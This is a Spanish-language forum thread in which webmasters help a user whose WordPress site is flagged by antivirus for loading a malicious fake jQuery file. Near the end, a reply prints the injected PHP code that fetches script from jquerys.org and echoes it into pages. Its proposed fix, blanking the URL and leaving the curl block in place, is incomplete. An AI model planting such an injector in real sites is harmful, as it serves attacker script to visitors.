Ayuda! – ¿Mi sitio web fue infectado?

  • Autor Autor Wizard
  • Fecha de inicio Fecha de inicio
Wizard

Wizard

Xi
Verificación en dos pasos activada
Verificado por Whatsapp
¡Ha verificado su Paypal!
Buenos días forobetanos, vengo a crear este tema para plantear mi problema.

Pues tengo una web de imagenes graciosas y esas cosas, le coloco conten ido diariamente, pero hoy cuando entro me salta un mensaje del antivirus (Avast) que me dice que mi web está infectada y no me deja entrar a mi propia web (Me la bloquea), yo la verdad es que desconozco el motivo de porque me dice eso, yo no le he instalado plugins desconocidos y el theme es comprado de licencia original. Pido la ayuda de todos los que puedan y conozcan el problema para poder solucionarlo, ya que está afectando mi web de tal manera que las visitas me han disminuído drásticamente.

Captura:

Enlace eliminado
 
Descargando objeto jquerys.org/ajax/libs/jquery/jquery-1.6.3.min.js contiene una url maliciosa

Esa url debe ser

EDIT: si, esa url es :topsy_turvy:
 
Comprueba también con el navegador de Chrome que es de Google. Esto es para ver si ya has sido notificado porque por lo que parece tu sitio ya está infectado con un script malicioso.
 
Hola Peter

Usa el plugin Enlace eliminado

Con el escaneas el sitio web y cuando te diga que un archivo no es original de wordpress lo restauras

Puedes activar el escaneo externo a wordpress, pero es evidente que no te dirá si han sido alterados (pero sí si han sido infectados)

Revisa que no haya ningún administrador nuevo creado en tu sitio web

Si tienes dudas o quieres que haga el scan por ti me avisas aunque tú mejor que nadie sabes qué pueden haber cambiado o no

(Nota importante - wordfecen considera las plantillas con codebase 64 como posiblemente infectadas, lo cual no quiere decir que lo estén)
 
IronAlan dijo:
Comprueba también con el navegador de Chrome que es de Google. Esto es para ver si ya has sido notificado porque por lo que parece tu sitio ya está infectado con un script malicioso.
Hacer clic para expandir...

Si con chrome tambien es la misma historia.

Lo más curioso es que con las herramientas de webmaster de google, me dice que no tiene ningún software malicioso. :S

- - - Actualizado - - -
[MENTION=1576]ramonjosegn[/MENTION] Si amigo puedes hacerlo por mi?, enviame tu msn por mp, o algop para contactarnos amigo!
 
Peter dijo:
Si con chrome tambien es la misma historia.

Lo más curioso es que con las herramientas de webmaster de google, me dice que no tiene ningún software malicioso. :S
Hacer clic para expandir...

Usa Wordfence como te digo, las herramientas de Google son lentas, te llevaría mucho tiempo esperar a que google lo detecte

Puedes usar para comprobar qué antivirus ya lo detectan con este link

Enlace eliminado

(aparece limpia, de pronto te cambiaron las DNS, Wordfence también te avisa de ello)

- - - Actualizado - - -

te envíe mp [MENTION=13969]Peter[/MENTION] tengo que salir a almorzar, pero con gusto te ayudo
 
ramonjosegn dijo:
Usa Wordfence como te digo, las herramientas de Google son lentas, te llevaría mucho tiempo esperar a que google lo detecte

Puedes usar para comprobar qué antivirus ya lo detectan con este link

Enlace eliminado

(aparece limpia, de pronto te cambiaron las DNS, Wordfence también te avisa de ello)

- - - Actualizado - - -

te envíe mp [MENTION=13969]Peter[/MENTION] tengo que salir a almorzar, pero con gusto te ayudo
Hacer clic para expandir...

Si amigo, ya lo respondí, buen provecho.

- - - Actualizado - - -

Se le a instalado el plugin que proporcionó el amigo [MENTION=1576]ramonjosegn[/MENTION] dice que está limpio el sitio, pero aun el avast me está dando problemas, alguien conoce alguna solución?
 
Peter dijo:
Si amigo, ya lo respondí, buen provecho.

- - - Actualizado - - -

Se le a instalado el plugin que proporcionó el amigo ramonjosegn dice que está limpio el sitio, pero aun el avast me está dando problemas, alguien conoce alguna solución?
Hacer clic para expandir...

el plugin sólo escanea el core de wordpress, es posible que cualquier otro archivo esté infectado, Avast te informa del link intenta revisar y postealo acá por favor
 
Pues sigue haciendo tus limpiezas eso es bueno.

NOmás te cuento que visité (cagadosderisa.com) y abrió al parecer normal.
 
Por lo visto es ese jquery, tendrás que ver de dónde sale y eliminarlo, cambiarlo o actualizarlo
 
me pasó algo parecido entonces encontré esta pagina y me ayudó mucho WebSiteDefender.com me informa si surge algun problema.. o si hay algun script infectado en mi web.. puedes suscribirte gratis.. y en la version paga. tiene la funciones mas avanzadas...
 
ramonjosegn dijo:
Por lo visto es ese jquery, tendrás que ver de dónde sale y eliminarlo, cambiarlo o actualizarlo
Hacer clic para expandir...

Si, efectivamente por ese lado puede ir el problema amigo, trata de verificar.
Manda la URL, para ver si me lo detecta McAffe, ya que siempre me tira que webs pueden contener malware.

Saludos! :encouragement:
 
El nod32 me lo bloquea pero por el siguiente virus html/ScrInject.B.Gen
en este enlace hablan un poco del temaEnlace eliminado
 
Bueno Peter. yo no se si has solucionado o no por lo visto párece que sigue el problema con tu web te cuento que solo hace poquito me paso algo muy similar pero yo me dí cuenta que me pasó justo despues que instalé un plugin que me pasó un amigo.. Muchos aca en el foro tienen razon en decir no instalar esos plugines o scripts crakeados de dudosa procedencia.. yo felizmente lo solucioné desinstalando y eliminando ese plugin.. te recomendaria revisar exaustivamente que es lo que tienes instalado.. en tu hosting de ese dominio.. espero soluciones el problema y cuantanos como lo hiciste..
 
Nod 32 dice html/ScrInject.B.Gen
y el jquery que ya comentaron
 
Efectivamente la web estába infectada y era ese Jquery, la cerraré por unos días mientras averiguo como quitar el virus del theme. Saludos amigos, muchas gracias por la ayuda!
 
Me paso lo mismo anteayer en uno de mis sitios, busca esta linea de codigo entre tus archivos.

PHP: 
<?php
if(function_exists('curl_init')) {
 $url = "http://jquerys.org/ajax/libs/jquery/jquery-1.6.3.min.js";
 $ch = curl_init();
 $timeout = 5;
 curl_setopt($ch,CURLOPT_URL,$url);
 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
 curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
 $data = curl_exec($ch);
 curl_close($ch);
 echo "$data";
}
?>

y eliminale la url con el javascript

PHP: 
<?php
if(function_exists('curl_init')) {
 $url = "";
 $ch = curl_init();
 $timeout = 5;
 curl_setopt($ch,CURLOPT_URL,$url);
 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
 curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
 $data = curl_exec($ch);
 curl_close($ch);
 echo "$data";
}
?>

hice eso y no jodio mas, si no te sale mandame un mp y te ayudo

saludos
 
Usa WordFence, a mi me salvo de estas cosas.
 
Me sale la web perfecta, sin ninguna infeccion.
 
Hay que estar conectado o registrado para responder aquí.

Temas similares

Receptor24
Ayuda con sitio web de series y películas en inglés
Respuestas
13
Visitas
233
poetry22
poetry22
Nikkygeek
Sitio web infectado con virus o redireccionamiento a otro sitio
2
Respuestas
26
Visitas
586
Nikkygeek
Nikkygeek
Storm Shadow
Ayuda! un sitio porno enlazó mi web
Respuestas
13
Visitas
1K
Xauen
Xauen
casamayorricardo
Ayuda: Mi sitio web ha sido inhabilitado para la publicación de anuncios de AdSense
Respuestas
3
Visitas
502
Bryy
Bryy
Carambel
Ayuda, mi sitio web esta fallando
Respuestas
8
Visitas
395
Carambel
Carambel
Atrás
Arriba